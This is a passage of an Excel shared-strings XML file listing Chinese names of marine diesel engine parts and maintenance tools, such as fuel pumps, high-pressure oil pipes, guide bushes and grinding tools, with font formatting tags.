        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵执行器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵执行器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵体组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导向柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油油量传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油共轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏回流管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油供油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端走台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端走台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端走台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端走台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台外形图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四半式刮油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀底块量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接螺母拧紧用装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮（整体式）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮测量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路通用焊接符号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆拆装梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>玻璃纤维布</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辉光灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器曲线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动伐研磨环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内圆研磨胎</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内侧研磨胎</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外侧研磨胎</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀头研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀座研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀座研磨轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀拆装梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆修磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管研磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动控制值</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向构件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨芯轴导承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞导环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向螺套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头导向螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块中间部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导靴中间件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指导说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机调校说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分段式钢圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接拉手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉手螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦拆卸手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热处理规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进出加热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>使用重油运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺丝刀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头接杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱头紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁头内六角螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带十字孔的六角头固定螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器高压油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油高压油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压注油枪</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压活塞泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰链</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带铰链盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分段式支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半段支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架剖视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架下半段</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
